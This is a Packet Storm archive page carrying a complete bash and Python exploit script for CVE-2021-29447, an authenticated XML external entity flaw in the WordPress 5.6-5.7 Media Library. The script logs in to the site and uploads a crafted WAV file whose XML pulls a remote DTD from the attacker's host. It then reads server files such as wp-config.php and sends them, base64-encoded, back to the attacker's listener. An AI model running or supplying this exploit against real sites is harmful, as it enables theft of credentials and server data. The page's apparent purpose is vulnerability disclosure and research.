exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress 5.7 Media Library XML Injection

WordPress 5.7 Media Library XML Injection
Posted Sep 20, 2021
Authored by David Uton

WordPress version 5.7 suffers from a Media Library XML external entity injection vulnerability.

tags | exploit
advisories | CVE-2021-29447
SHA-256 | f4d5079185c7b7a82974659421942eaed8b4ed45e1818b1ece7631fe12e92485

WordPress 5.7 Media Library XML Injection

Change Mirror Download
# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
# Date: 16/09/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://wordpress.com
# Affected Version: WordPress 5.6-5.7 & PHP8
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2021-29447

#!/bin/bash

# Author: @David_Uton (m3n0sd0n4ld)
# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX


# Variables
rHost=$1
username=$2
password=$3
readFile=$4
lHost=$5

# Functions
# Logotype
logoType(){
echo "
=====================================
CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
====================================="
}

# Create wav malicious
wavCreate(){
echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
}

# Create xx3.dtd
dtdCreate(){
cat <<EOT > xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://$lHost:8000/?p=%file;'>" >
EOT
}

# wav upload
wavUpload(){
cat <<EOT > .upload.py
#/usr/bin/env python3

import requests, re, sys

postData = {
'log':"$username",
'pwd':"$password",
'wp-submit':'Log In',
'redirect_to':'http://$rHost/wp-admin/',
'testcookie':1
}

r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True

cookies = r.cookies

print("[+] Getting Wp Nonce ... ")

res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)

if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)

print("[+] Uploading the wav file ... ")

postData = {
'name': 'payload.wav',
'action': 'upload-attachment',
'_wpnonce': wp_nonce
}

wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
if r_upload.status_code == 200:
image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
print('[+] Wav uploaded successfully')
else :
print("[-] Failed to receive a response for uploaded! Try again . \n")
exit(0)
EOT
python3 .upload.py
}

# Server Sniffer
serverSniffer(){
statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
}

# Load file and decoder
loadFile(){
content="http.server.log"
wavUpload

while :
do
if [[ -s $content ]]; then
echo "[+] Obtaining file information..."
sleep 5s # Increase time if the server is slow

base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u)

# Check file exists
echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php
sizeCheck=$(wc -c decode.php | awk '{printf $1}')
if [[ $sizeCheck -gt "46" ]]; then
php decode.php
else
echo "[!] File does not exist or is not allowed to be read."
fi
break
fi
done
}

# Cleanup
cleanup(){
kill $(cat http.server.pid) &>/dev/null
rm http.server.log http.server.pid &>/dev/null
rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
}


# Execute
logoType

# Checking parameters
if [[ $# -ne 5 ]];then
echo "[!] Parameters are missing!!!"
echo ""
echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
else

# Test Connection...
echo "[*] Test connection to WordPress..."

# WP Auth
authCheck=$(curl -i -s -k -X $'POST' \
-H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'wordpress_test_cookie=WP%20Cookie%20check' \
--data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
"http://$rHost/wp-login.php" > .cookies.tmp)

auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }')

# Running authentication with WordPress.

if [[ $auth != "302" ]]; then
echo "[-] Authentication failed ! Check username and password"
else
echo "[+] Authentication successfull!!!"

# Create wav & dtd file
wavCreate
dtdCreate
serverSniffer
loadFile
cleanup
fi
fi

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close